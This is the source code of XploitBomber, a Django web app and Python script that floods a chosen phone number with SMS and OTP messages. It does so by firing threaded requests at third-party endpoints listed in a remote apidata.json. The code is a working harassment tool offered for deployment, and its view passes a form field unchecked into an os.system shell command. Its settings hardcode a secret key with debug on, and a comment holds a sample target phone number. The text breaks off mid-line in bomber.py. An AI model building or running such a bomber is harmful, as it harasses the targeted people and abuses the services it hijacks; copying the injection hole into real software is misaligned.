├── db.sqlite3 ├── bomber ├── __init__.py ├── migrations │ └── __init__.py ├── models.py ├── tests.py ├── admin.py ├── apps.py ├── urls.py └── views.py ├── .version ├── Xploitbomber ├── __init__.py ├── asgi.py ├── wsgi.py ├── urls.py └── settings.py ├── .gitignore ├── .notify ├── Procfile ├── requirements.txt ├── app.json ├── README.md ├── manage.py ├── utils ├── decorators.py └── provider.py ├── isdcodes.json ├── templates └── index.html ├── bomber.py ├── apidata.json └── LICENSE /db.sqlite3: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /bomber/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.version: -------------------------------------------------------------------------------- 1 | v2.0b2 2 | -------------------------------------------------------------------------------- /Xploitbomber/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__/ 2 | .idea/ -------------------------------------------------------------------------------- /bomber/migrations/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.notify: -------------------------------------------------------------------------------- 1 | For Any Queries, Join t.me/nitrohacker 2 | -------------------------------------------------------------------------------- /Procfile: -------------------------------------------------------------------------------- 1 | web: gunicorn Xploitbomber.wsgi:application --log-file - -------------------------------------------------------------------------------- /bomber/models.py: -------------------------------------------------------------------------------- 1 | from django.db import models 2 | 3 | # Create your models here. 4 | -------------------------------------------------------------------------------- /bomber/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /bomber/admin.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | 3 | # Register your models here. 4 | -------------------------------------------------------------------------------- /bomber/apps.py: -------------------------------------------------------------------------------- 1 | from django.apps import AppConfig 2 | 3 | 4 | class BomberConfig(AppConfig): 5 | default_auto_field = 'django.db.models.BigAutoField' 6 | name = 'bomber' 7 | -------------------------------------------------------------------------------- /bomber/urls.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | from django.urls import path 3 | from . import views 4 | 5 | urlpatterns = [ 6 | path('',views.index,name='index'), 7 | path('doattack/', views.doattack), 8 | 9 | 10 | ] -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | asgiref==3.2.5 2 | dj-database-url==0.5.0 3 | Django 4 | django-heroku 5 | gunicorn 6 | psycopg2==2.8.4 7 | pytz==2019.3 8 | sqlparse==0.3.1 9 | whitenoise==5.0.1 10 | certifi>=2020.6.20 11 | chardet>=3.0.4 12 | colorama>=0.4.3 13 | idna>=2.10 14 | requests>=2.24.0 15 | 16 | -------------------------------------------------------------------------------- /app.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "XploitBomber", 3 | "description": "A Web Based Sms Bomber Using Django And Python", 4 | "repository": "https://github.com/xploitwizer/XploitBomber", 5 | "logo": "https://avatars0.githubusercontent.com/u/55348093?s=200&v=4", 6 | "keywords": ["XploitBomber", "SMS Bomber"] 7 | } -------------------------------------------------------------------------------- /Xploitbomber/asgi.py: -------------------------------------------------------------------------------- 1 | """ 2 | ASGI config for Xploitbomber project. 3 | 4 | It exposes the ASGI callable as a module-level variable named ``application``. 5 | 6 | For more information on this file, see 7 | https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/ 8 | """ 9 | 10 | import os 11 | 12 | from django.core.asgi import get_asgi_application 13 | 14 | os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Xploitbomber.settings') 15 | 16 | application = get_asgi_application() 17 | -------------------------------------------------------------------------------- /Xploitbomber/wsgi.py: -------------------------------------------------------------------------------- 1 | """ 2 | WSGI config for Xploitbomber project. 3 | 4 | It exposes the WSGI callable as a module-level variable named ``application``. 5 | 6 | For more information on this file, see 7 | https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/ 8 | """ 9 | 10 | import os 11 | 12 | from django.core.wsgi import get_wsgi_application 13 | 14 | os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Xploitbomber.settings') 15 | 16 | application = get_wsgi_application() 17 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # XploitBomber 2 | Web Based Bomber Using Django And Python 3 | 4 | [![Deploy](https://www.herokucdn.com/deploy/button.svg)](https://heroku.com/deploy?template=https://github.com/XploitWizer/XploitBomber) 5 | 6 | * [XploitBomber](https://xploitbomber.herokuapp.com/) - Click Here To See Demo 7 | 8 | ### XploitWizer Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool. 9 | ### XploitBomber is built for Educational Purpose. Use at your own Risk. 10 | 11 | # Team XploitWizer -------------------------------------------------------------------------------- /manage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """Django's command-line utility for administrative tasks.""" 3 | import os 4 | import sys 5 | 6 | 7 | def main(): 8 | """Run administrative tasks.""" 9 | os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Xploitbomber.settings') 10 | try: 11 | from django.core.management import execute_from_command_line 12 | except ImportError as exc: 13 | raise ImportError( 14 | "Couldn't import Django. Are you sure it's installed and " 15 | "available on your PYTHONPATH environment variable? Did you " 16 | "forget to activate a virtual environment?" 17 | ) from exc 18 | execute_from_command_line(sys.argv) 19 | 20 | 21 | if __name__ == '__main__': 22 | main() 23 | -------------------------------------------------------------------------------- /Xploitbomber/urls.py: -------------------------------------------------------------------------------- 1 | """Xploitbomber URL Configuration 2 | 3 | The `urlpatterns` list routes URLs to views. For more information please see: 4 | https://docs.djangoproject.com/en/3.2/topics/http/urls/ 5 | Examples: 6 | Function views 7 | 1. Add an import: from my_app import views 8 | 2. Add a URL to urlpatterns: path('', views.home, name='home') 9 | Class-based views 10 | 1. Add an import: from other_app.views import Home 11 | 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') 12 | Including another URLconf 13 | 1. Import the include() function: from django.urls import include, path 14 | 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) 15 | """ 16 | from django.contrib import admin 17 | from django.urls import path,include 18 | 19 | urlpatterns = [ 20 | path('admin/', admin.site.urls), 21 | path('', include('bomber.urls')), 22 | ] 23 | -------------------------------------------------------------------------------- /bomber/views.py: -------------------------------------------------------------------------------- 1 | from django.contrib import messages 2 | from django.http import HttpResponse 3 | from django.shortcuts import render,redirect 4 | import multiprocessing 5 | import time 6 | 7 | 8 | def index(request): 9 | return render(request,'index.html') 10 | 11 | def doattack(request): 12 | import os 13 | 14 | mobile_no = request.POST.get("mn") 15 | frequency_no = request.POST.get("fq") 16 | country_code = request.POST.get("cc") 17 | 18 | try: 19 | if mobile_no == "" or int(frequency_no) < 0 or len(mobile_no) != 10 or frequency_no == "" or (frequency_no.isdigit() == False) or (mobile_no.isdigit() == False): 20 | messages.error(request, "Invalid Input ") 21 | return redirect("/") 22 | except: 23 | messages.error(request, "Error") 24 | return redirect("/") 25 | 26 | if int(frequency_no) >= 1000 : 27 | frequency_no = "1000" 28 | 29 | #FOR WINDOWS 30 | # os.system(f"python bomber.py --num {frequency_no} {mobile_no}") 31 | 32 | #FOR LINUX SERVER(AWS) 33 | # os.system(f"nohup /home/ubuntu/env/bin/python3 bomber.py --num {frequency_no} {mobile_no} &") 34 | 35 | #FOR HEROKU 36 | os.system(f"nohup python bomber.py --num {int(frequency_no)*2} --country {country_code} {mobile_no} &") 37 | # os.system(f"nohup /usr/bin/python3 bomber.py --num 10 --country 91 7466067516 &") 38 | # os.system(f"nohup python bomber.py --num 10 --country 91 7466067516 &") 39 | 40 | 41 | messages.success(request, f"ATTACK STARTED AT {mobile_no} WITH {frequency_no} SMS ") 42 | return redirect("/") -------------------------------------------------------------------------------- /utils/decorators.py: -------------------------------------------------------------------------------- 1 | from colorama import Fore, Style 2 | 3 | 4 | class IconicDecorator(object): 5 | def __init__(self): 6 | self.PASS = Style.BRIGHT + Fore.GREEN + "[ ✔ ]" + Style.RESET_ALL 7 | self.FAIL = Style.BRIGHT + Fore.RED + "[ ✘ ]" + Style.RESET_ALL 8 | self.WARN = Style.BRIGHT + Fore.YELLOW + "[ ! ]" + Style.RESET_ALL 9 | self.HEAD = Style.BRIGHT + Fore.CYAN + "[ # ]" + Style.RESET_ALL 10 | self.CMDL = Style.BRIGHT + Fore.BLUE + "[ → ]" + Style.RESET_ALL 11 | self.STDS = " " 12 | 13 | 14 | class StatusDecorator(object): 15 | def __init__(self): 16 | self.PASS = Style.BRIGHT + Fore.GREEN + "[ SUCCESS ]" + Style.RESET_ALL 17 | self.FAIL = Style.BRIGHT + Fore.RED + "[ FAILURE ]" + Style.RESET_ALL 18 | self.WARN = Style.BRIGHT + Fore.YELLOW + "[ WARNING ]"\ 19 | + Style.RESET_ALL 20 | self.HEAD = Style.BRIGHT + Fore.CYAN + "[ SECTION ]" + Style.RESET_ALL 21 | self.CMDL = Style.BRIGHT + Fore.BLUE + "[ COMMAND ]" + Style.RESET_ALL 22 | self.STDS = " " 23 | 24 | 25 | class MessageDecorator(object): 26 | def __init__(self, attr): 27 | ICON = IconicDecorator() 28 | STAT = StatusDecorator() 29 | if attr == "icon": 30 | self.PASS = ICON.PASS 31 | self.FAIL = ICON.FAIL 32 | self.WARN = ICON.WARN 33 | self.HEAD = ICON.HEAD 34 | self.CMDL = ICON.CMDL 35 | self.STDS = ICON.STDS 36 | elif attr == "stat": 37 | self.PASS = STAT.PASS 38 | self.FAIL = STAT.FAIL 39 | self.WARN = STAT.WARN 40 | self.HEAD = STAT.HEAD 41 | self.CMDL = STAT.CMDL 42 | self.STDS = STAT.STDS 43 | 44 | def SuccessMessage(self, RequestMessage): 45 | print(self.PASS + " " + Style.RESET_ALL + RequestMessage) 46 | 47 | def FailureMessage(self, RequestMessage): 48 | print(self.FAIL + " " + Style.RESET_ALL + RequestMessage) 49 | 50 | def WarningMessage(self, RequestMessage): 51 | print(self.WARN + " " + Style.RESET_ALL + RequestMessage) 52 | 53 | def SectionMessage(self, RequestMessage): 54 | print(self.HEAD + " " + Fore.CYAN + Style.BRIGHT 55 | + RequestMessage + Style.RESET_ALL) 56 | 57 | def CommandMessage(self, RequestMessage): 58 | return self.CMDL + " " + Style.RESET_ALL + RequestMessage 59 | 60 | def GeneralMessage(self, RequestMessage): 61 | print(self.STDS + " " + Style.RESET_ALL + RequestMessage) 62 | 63 | -------------------------------------------------------------------------------- /utils/provider.py: -------------------------------------------------------------------------------- 1 | import threading 2 | import requests 3 | import json 4 | import random 5 | import time 6 | 7 | 8 | class APIProvider: 9 | 10 | api_providers = [] 11 | delay = 0 12 | status = True 13 | 14 | def __init__(self, cc, target, mode, delay=0): 15 | try: 16 | PROVIDERS = requests.get( 17 | "https://github.com/TheSpeedX/TBomb/raw/master/apidata.json" 18 | ).json() 19 | except Exception: 20 | PROVIDERS = json.load(open('apidata.json', 'r')) 21 | self.config = None 22 | self.cc = cc 23 | self.target = target 24 | self.mode = mode 25 | self.index = 0 26 | self.lock = threading.Lock() 27 | self.api_version = PROVIDERS.get("version", "2") 28 | APIProvider.delay = delay 29 | providers = PROVIDERS.get(mode.lower(), {}) 30 | APIProvider.api_providers = providers.get(cc, []) 31 | if len(APIProvider.api_providers) < 10: 32 | APIProvider.api_providers += providers.get("multi", []) 33 | 34 | def format(self): 35 | config_dump = json.dumps(self.config) 36 | config_dump = config_dump.replace("{target}", self.target) 37 | config_dump = config_dump.replace("{cc}", self.cc) 38 | self.config = json.loads(config_dump) 39 | 40 | def select_api(self): 41 | try: 42 | self.index = random.choice(range(len(APIProvider.api_providers))) 43 | except IndexError: 44 | self.index = -1 45 | return 46 | self.config = APIProvider.api_providers[self.index] 47 | perma_headers = {"User-Agent": 48 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0)" 49 | " Gecko/20100101 Firefox/72.0"} 50 | if "headers" in self.config: 51 | self.config["headers"].update(perma_headers) 52 | else: 53 | self.config["headers"] = perma_headers 54 | self.format() 55 | 56 | def remove(self): 57 | try: 58 | del APIProvider.api_providers[self.index] 59 | return True 60 | except Exception: 61 | return False 62 | 63 | def request(self): 64 | self.select_api() 65 | if not self.config or self.index == -1: 66 | return None 67 | identifier = self.config.pop("identifier", "").lower() 68 | del self.config['name'] 69 | self.config['timeout'] = 30 70 | response = requests.request(**self.config) 71 | return identifier in response.text.lower() 72 | 73 | def hit(self): 74 | try: 75 | if not APIProvider.status: 76 | return 77 | time.sleep(APIProvider.delay) 78 | self.lock.acquire() 79 | response = self.request() 80 | if response is False: 81 | self.remove() 82 | elif response is None: 83 | APIProvider.status = False 84 | return response 85 | except Exception: 86 | response = False 87 | finally: 88 | self.lock.release() 89 | return response 90 | -------------------------------------------------------------------------------- /Xploitbomber/settings.py: -------------------------------------------------------------------------------- 1 | """ 2 | Django settings for Xploitbomber project. 3 | 4 | Generated by 'django-admin startproject' using Django 3.2.2. 5 | 6 | For more information on this file, see 7 | https://docs.djangoproject.com/en/3.2/topics/settings/ 8 | 9 | For the full list of settings and their values, see 10 | https://docs.djangoproject.com/en/3.2/ref/settings/ 11 | """ 12 | 13 | import os 14 | from pathlib import Path 15 | 16 | # Build paths inside the project like this: BASE_DIR / 'subdir'. 17 | BASE_DIR = Path(__file__).resolve().parent.parent 18 | 19 | 20 | # Quick-start development settings - unsuitable for production 21 | # See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/ 22 | 23 | # SECURITY WARNING: keep the secret key used in production secret! 24 | SECRET_KEY = 'django-insecure-4dq0y3n(jbk6)(hufz-0qg59uiio=xykcq-un1gai_^p#yzbmv' 25 | 26 | # SECURITY WARNING: don't run with debug turned on in production! 27 | DEBUG = True 28 | 29 | ALLOWED_HOSTS = ["*"] 30 | 31 | 32 | # Application definition 33 | 34 | INSTALLED_APPS = [ 35 | 'django.contrib.admin', 36 | 'django.contrib.auth', 37 | 'django.contrib.contenttypes', 38 | 'django.contrib.sessions', 39 | 'django.contrib.messages', 40 | 'django.contrib.staticfiles', 41 | 'bomber' 42 | ] 43 | 44 | MIDDLEWARE = [ 45 | 'django.middleware.security.SecurityMiddleware', 46 | 'django.contrib.sessions.middleware.SessionMiddleware', 47 | 'django.middleware.common.CommonMiddleware', 48 | 'django.middleware.csrf.CsrfViewMiddleware', 49 | 'django.contrib.auth.middleware.AuthenticationMiddleware', 50 | 'django.contrib.messages.middleware.MessageMiddleware', 51 | 'django.middleware.clickjacking.XFrameOptionsMiddleware', 52 | ] 53 | 54 | ROOT_URLCONF = 'Xploitbomber.urls' 55 | 56 | TEMPLATES = [ 57 | { 58 | 'BACKEND': 'django.template.backends.django.DjangoTemplates', 59 | 'DIRS': ['templates'], 60 | 'APP_DIRS': True, 61 | 'OPTIONS': { 62 | 'context_processors': [ 63 | 'django.template.context_processors.debug', 64 | 'django.template.context_processors.request', 65 | 'django.contrib.auth.context_processors.auth', 66 | 'django.contrib.messages.context_processors.messages', 67 | ], 68 | }, 69 | }, 70 | ] 71 | 72 | WSGI_APPLICATION = 'Xploitbomber.wsgi.application' 73 | 74 | 75 | # Database 76 | # https://docs.djangoproject.com/en/3.2/ref/settings/#databases 77 | 78 | DATABASES = { 79 | 'default': { 80 | 'ENGINE': 'django.db.backends.sqlite3', 81 | 'NAME': BASE_DIR / 'db.sqlite3', 82 | } 83 | } 84 | 85 | 86 | # Password validation 87 | # https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators 88 | 89 | AUTH_PASSWORD_VALIDATORS = [ 90 | { 91 | 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', 92 | }, 93 | { 94 | 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', 95 | }, 96 | { 97 | 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', 98 | }, 99 | { 100 | 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', 101 | }, 102 | ] 103 | 104 | 105 | # Internationalization 106 | # https://docs.djangoproject.com/en/3.2/topics/i18n/ 107 | 108 | LANGUAGE_CODE = 'en-us' 109 | 110 | TIME_ZONE = 'UTC' 111 | 112 | USE_I18N = True 113 | 114 | USE_L10N = True 115 | 116 | USE_TZ = True 117 | 118 | 119 | # Static files (CSS, JavaScript, Images) 120 | # https://docs.djangoproject.com/en/3.2/howto/static-files/ 121 | 122 | STATIC_URL = '/static/' 123 | STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles') 124 | # Default primary key field type 125 | # https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field 126 | 127 | DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField' 128 | -------------------------------------------------------------------------------- /isdcodes.json: -------------------------------------------------------------------------------- 1 | { 2 | "isdcodes": { 3 | "93": "AF", 4 | "355": "AL", 5 | "213": "DZ", 6 | "376": "AD", 7 | "244": "AO", 8 | "672": "AQ", 9 | "54": "AR", 10 | "374": "AM", 11 | "297": "AW", 12 | "61": "AU", 13 | "43": "AT", 14 | "994": "AZ", 15 | "973": "BH", 16 | "880": "BD", 17 | "375": "BY", 18 | "32": "BE", 19 | "501": "BZ", 20 | "229": "BJ", 21 | "975": "BT", 22 | "591": "BO", 23 | "387": "BA", 24 | "267": "BW", 25 | "55": "BR", 26 | "246": "IO", 27 | "673": "BN", 28 | "359": "BG", 29 | "226": "BF", 30 | "257": "BI", 31 | "855": "KH", 32 | "237": "CM", 33 | "238": "CV", 34 | "236": "CF", 35 | "235": "TD", 36 | "56": "CL", 37 | "86": "CN", 38 | "57": "CO", 39 | "269": "KM", 40 | "682": "CK", 41 | "506": "CR", 42 | "385": "HR", 43 | "53": "CU", 44 | "599": "AN", 45 | "357": "CY", 46 | "420": "CZ", 47 | "243": "CD", 48 | "45": "DK", 49 | "253": "DJ", 50 | "670": "TL", 51 | "593": "EC", 52 | "20": "EG", 53 | "503": "SV", 54 | "240": "GQ", 55 | "291": "ER", 56 | "372": "EE", 57 | "251": "ET", 58 | "500": "FK", 59 | "298": "FO", 60 | "679": "FJ", 61 | "358": "FI", 62 | "33": "FR", 63 | "689": "PF", 64 | "241": "GA", 65 | "220": "GM", 66 | "995": "GE", 67 | "49": "DE", 68 | "233": "GH", 69 | "350": "GI", 70 | "30": "GR", 71 | "299": "GL", 72 | "502": "GT", 73 | "224": "GN", 74 | "245": "GW", 75 | "592": "GY", 76 | "509": "HT", 77 | "504": "HN", 78 | "852": "HK", 79 | "36": "HU", 80 | "354": "IS", 81 | "91": "IN", 82 | "62": "ID", 83 | "98": "IR", 84 | "964": "IQ", 85 | "353": "IE", 86 | "972": "IL", 87 | "39": "IT", 88 | "225": "CI", 89 | "81": "JP", 90 | "962": "JO", 91 | "254": "KE", 92 | "686": "KI", 93 | "383": "XK", 94 | "965": "KW", 95 | "996": "KG", 96 | "856": "LA", 97 | "371": "LV", 98 | "961": "LB", 99 | "266": "LS", 100 | "231": "LR", 101 | "218": "LY", 102 | "423": "LI", 103 | "370": "LT", 104 | "352": "LU", 105 | "853": "MO", 106 | "389": "MK", 107 | "261": "MG", 108 | "265": "MW", 109 | "60": "MY", 110 | "960": "MV", 111 | "223": "ML", 112 | "356": "MT", 113 | "692": "MH", 114 | "222": "MR", 115 | "230": "MU", 116 | "262": "RE", 117 | "52": "MX", 118 | "691": "FM", 119 | "373": "MD", 120 | "377": "MC", 121 | "976": "MN", 122 | "382": "ME", 123 | "212": "EH", 124 | "258": "MZ", 125 | "95": "MM", 126 | "264": "NA", 127 | "674": "NR", 128 | "977": "NP", 129 | "31": "NL", 130 | "687": "NC", 131 | "64": "NZ", 132 | "505": "NI", 133 | "227": "NE", 134 | "234": "NG", 135 | "683": "NU", 136 | "850": "KP", 137 | "47": "SJ", 138 | "968": "OM", 139 | "92": "PK", 140 | "680": "PW", 141 | "970": "PS", 142 | "507": "PA", 143 | "675": "PG", 144 | "595": "PY", 145 | "51": "PE", 146 | "63": "PH", 147 | "48": "PL", 148 | "351": "PT", 149 | "974": "QA", 150 | "242": "CG", 151 | "40": "RO", 152 | "7": "RU", 153 | "250": "RW", 154 | "590": "MF", 155 | "290": "SH", 156 | "508": "PM", 157 | "685": "WS", 158 | "378": "SM", 159 | "239": "ST", 160 | "966": "SA", 161 | "221": "SN", 162 | "381": "RS", 163 | "248": "SC", 164 | "232": "SL", 165 | "65": "SG", 166 | "421": "SK", 167 | "386": "SI", 168 | "677": "SB", 169 | "252": "SO", 170 | "27": "ZA", 171 | "82": "KR", 172 | "211": "SS", 173 | "34": "ES", 174 | "94": "LK", 175 | "249": "SD", 176 | "597": "SR", 177 | "268": "SZ", 178 | "46": "SE", 179 | "41": "CH", 180 | "963": "SY", 181 | "886": "TW", 182 | "992": "TJ", 183 | "255": "TZ", 184 | "66": "TH", 185 | "228": "TG", 186 | "690": "TK", 187 | "676": "TO", 188 | "216": "TN", 189 | "90": "TR", 190 | "993": "TM", 191 | "688": "TV", 192 | "256": "UG", 193 | "380": "UA", 194 | "971": "AE", 195 | "44": "GB", 196 | "1": "US", 197 | "598": "UY", 198 | "998": "UZ", 199 | "678": "VU", 200 | "379": "VA", 201 | "58": "VE", 202 | "84": "VN", 203 | "681": "WF", 204 | "967": "YE", 205 | "260": "ZM", 206 | "263": "ZW" 207 | } 208 | } -------------------------------------------------------------------------------- /templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | {% load static %} 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | XPLOITBOMBER 27 | 28 | 29 | 184 | 185 | 188 | 189 | 190 | 191 | 196 | 197 | 198 | 199 | 200 | 201 | 202 |
203 | {% if messages %} 204 | {% for msg in messages %} 205 | 208 | {% endfor %} 209 | {% endif %} 210 |
211 | 212 | 213 | 214 |
215 |
216 |

217 | XPLOITBOMBER 218 |

219 |
220 |
221 | {% csrf_token %} 222 |
223 |
224 |

225 | 226 |

227 |
228 | 229 |
230 |
231 | 232 |
233 |
234 |
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 | 243 | 244 | 245 |
246 | 247 |
248 |
249 |
250 |
251 |
252 |
253 |
254 |
255 |
256 |
257 | 258 | 259 | 260 | 261 | 262 |
263 | 264 |
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 |
274 | 288 | 289 |
290 | 291 |
292 |
293 | 294 | 295 | 296 | 297 | 298 | 299 | 300 | 301 | 302 | -------------------------------------------------------------------------------- /bomber.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: UTF-8 -*- 3 | 4 | import os 5 | import shutil 6 | import sys 7 | import subprocess 8 | import string 9 | import random 10 | import json 11 | import re 12 | import time 13 | import argparse 14 | 15 | from concurrent.futures import ThreadPoolExecutor, as_completed 16 | 17 | from utils.decorators import MessageDecorator 18 | from utils.provider import APIProvider 19 | 20 | try: 21 | import requests 22 | from colorama import Fore, Style 23 | except ImportError: 24 | print("\tSome dependencies could not be imported (possibly not installed)") 25 | print( 26 | "Type `pip3 install -r requirements.txt` to " 27 | " install all required packages") 28 | sys.exit(1) 29 | 30 | 31 | def readisdc(): 32 | with open("isdcodes.json") as file: 33 | isdcodes = json.load(file) 34 | return isdcodes 35 | 36 | 37 | def get_version(): 38 | try: 39 | return open(".version", "r").read().strip() 40 | except Exception: 41 | return '1.0' 42 | 43 | 44 | def clr(): 45 | if os.name == "nt": 46 | os.system("cls") 47 | else: 48 | os.system("clear") 49 | 50 | 51 | def bann_text(): 52 | clr() 53 | logo = "xploit" 54 | version = "Version: "+__VERSION__ 55 | contributors = "Contributors: "+" ".join(__CONTRIBUTORS__) 56 | print(random.choice(ALL_COLORS) + logo + RESET_ALL) 57 | mesgdcrt.SuccessMessage(version) 58 | mesgdcrt.SectionMessage(contributors) 59 | print() 60 | 61 | 62 | def check_intr(): 63 | try: 64 | requests.get("https://motherfuckingwebsite.com") 65 | except Exception: 66 | bann_text() 67 | mesgdcrt.FailureMessage("Poor internet connection detected") 68 | sys.exit(2) 69 | 70 | 71 | def format_phone(num): 72 | num = [n for n in num if n in string.digits] 73 | return ''.join(num).strip() 74 | 75 | 76 | def do_zip_update(): 77 | pass 78 | # success = False 79 | 80 | # # Download Zip from git 81 | # # Unzip and overwrite the current folder 82 | 83 | # if success: 84 | # mesgdcrt.SuccessMessage("TBomb was updated to the latest version") 85 | # mesgdcrt.GeneralMessage( 86 | # "Please run the script again to load the latest version") 87 | # else: 88 | # mesgdcrt.FailureMessage("Unable to update TBomb.") 89 | # mesgdcrt.WarningMessage( 90 | # "Grab The Latest one From https://github.com/Hackertrackersj/Tbomb.git") 91 | 92 | # sys.exit() 93 | 94 | 95 | def do_git_update(): 96 | pass 97 | # success = False 98 | # try: 99 | # print(ALL_COLORS[0]+"UPDATING "+RESET_ALL, end='') 100 | # process = subprocess.Popen("git checkout . && git pull ", 101 | # shell=True, 102 | # stdout=subprocess.PIPE, 103 | # stderr=subprocess.STDOUT) 104 | # while process: 105 | # print(ALL_COLORS[0]+'.'+RESET_ALL, end='') 106 | # time.sleep(1) 107 | # returncode = process.poll() 108 | # if returncode is not None: 109 | # break 110 | # success = not process.returncode 111 | # except Exception: 112 | # success = False 113 | # print("\n") 114 | 115 | # if success: 116 | # mesgdcrt.SuccessMessage("TBomb was updated to the latest version") 117 | # mesgdcrt.GeneralMessage( 118 | # "Please run the script again to load the latest version") 119 | # else: 120 | # mesgdcrt.FailureMessage("Unable to update TBomb.") 121 | # mesgdcrt.WarningMessage("Make Sure To Install 'git' ") 122 | # mesgdcrt.GeneralMessage("Then run command:") 123 | # print( 124 | # "git checkout . && " 125 | # "git pull https://github.com/Hackertrackersj/Tbomb HEAD") 126 | # sys.exit() 127 | 128 | 129 | def update(): 130 | pass 131 | # if shutil.which('git'): 132 | # do_git_update() 133 | # else: 134 | # do_zip_update() 135 | 136 | 137 | def check_for_updates(): 138 | pass 139 | # mesgdcrt.SectionMessage("Checking for updates") 140 | # fver = requests.get( 141 | # "https://raw.githubusercontent.com/Hackertrackersj/Tbomb/master/.version" 142 | # ).text.strip() 143 | # if fver != __VERSION__: 144 | # mesgdcrt.WarningMessage("An update is available") 145 | # mesgdcrt.GeneralMessage("Starting update...") 146 | # update() 147 | # else: 148 | # mesgdcrt.SuccessMessage("TBomb is up-to-date") 149 | # mesgdcrt.GeneralMessage("Starting TBomb") 150 | 151 | 152 | def notifyen(): 153 | try: 154 | noti = requests.get( 155 | "https://raw.githubusercontent.com/Hackertrackersj/Tbomb/master/.notify" 156 | ).text.upper() 157 | if len(noti) > 10: 158 | mesgdcrt.SectionMessage("NOTIFICATION: " + noti) 159 | print() 160 | except Exception: 161 | pass 162 | 163 | 164 | def get_phone_info(): 165 | while True: 166 | target = "" 167 | # cc = input(mesgdcrt.CommandMessage("Enter your country code (Without +): ")) 168 | cc = str(args.country) 169 | cc = format_phone(cc) 170 | if not country_codes.get(cc, False): 171 | mesgdcrt.WarningMessage( 172 | "The country code ({cc}) that you have entered" 173 | " is invalid or unsupported".format(cc=cc)) 174 | continue 175 | # target = input(mesgdcrt.CommandMessage("Enter the target number: +" + cc + " ")) 176 | target = str(args.target) 177 | 178 | target = format_phone(target) 179 | if ((len(target) <= 6) or (len(target) >= 12)): 180 | mesgdcrt.WarningMessage( 181 | "The phone number ({target})".format(target=target) + 182 | "that you have entered is invalid") 183 | continue 184 | return (cc, target) 185 | 186 | 187 | def get_mail_info(): 188 | mail_regex = r'^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w{2,3}$' 189 | while True: 190 | target = input(mesgdcrt.CommandMessage("Enter target mail: ")) 191 | if not re.search(mail_regex, target, re.IGNORECASE): 192 | mesgdcrt.WarningMessage( 193 | "The mail ({target})".format(target=target) + 194 | " that you have entered is invalid") 195 | continue 196 | return target 197 | 198 | 199 | def pretty_print(cc, target, success, failed): 200 | requested = success+failed 201 | mesgdcrt.SectionMessage("Bombing is in progress - Please be patient") 202 | mesgdcrt.GeneralMessage( 203 | "Please stay connected to the internet during bombing") 204 | mesgdcrt.GeneralMessage("Target : " + cc + " " + target) 205 | mesgdcrt.GeneralMessage("Sent : " + str(requested)) 206 | mesgdcrt.GeneralMessage("Successful : " + str(success)) 207 | mesgdcrt.GeneralMessage("Failed : " + str(failed)) 208 | mesgdcrt.WarningMessage( 209 | "This tool was made for fun and research purposes only") 210 | mesgdcrt.SuccessMessage("TBomb was created by nitro") 211 | 212 | 213 | def workernode(mode, cc, target, count, delay, max_threads): 214 | 215 | api = APIProvider(cc, target, mode, delay=delay) 216 | clr() 217 | mesgdcrt.SectionMessage("Gearing up the Bomber - Please be patient") 218 | mesgdcrt.GeneralMessage( 219 | "Please stay connected to the internet during bombing") 220 | mesgdcrt.GeneralMessage("API Version : " + api.api_version) 221 | mesgdcrt.GeneralMessage("Target : " + cc + target) 222 | mesgdcrt.GeneralMessage("Amount : " + str(count)) 223 | mesgdcrt.GeneralMessage("Threads : " + str(max_threads) + " threads") 224 | mesgdcrt.GeneralMessage("Delay : " + str(delay) + 225 | " seconds") 226 | mesgdcrt.WarningMessage( 227 | "This tool was made for fun and research purposes only") 228 | print() 229 | # input(mesgdcrt.CommandMessage("Press [CTRL+Z] to suspend the bomber or [ENTER] to resume it")) 230 | 231 | if len(APIProvider.api_providers) == 0: 232 | mesgdcrt.FailureMessage("Your country/target is not supported yet") 233 | mesgdcrt.GeneralMessage("Feel free to reach out to us") 234 | input(mesgdcrt.CommandMessage("Press [ENTER] to exit")) 235 | bann_text() 236 | sys.exit() 237 | 238 | success, failed = 0, 0 239 | while success < count: 240 | with ThreadPoolExecutor(max_workers=max_threads) as executor: 241 | jobs = [] 242 | for i in range(count-success): 243 | jobs.append(executor.submit(api.hit)) 244 | 245 | for job in as_completed(jobs): 246 | result = job.result() 247 | if result is 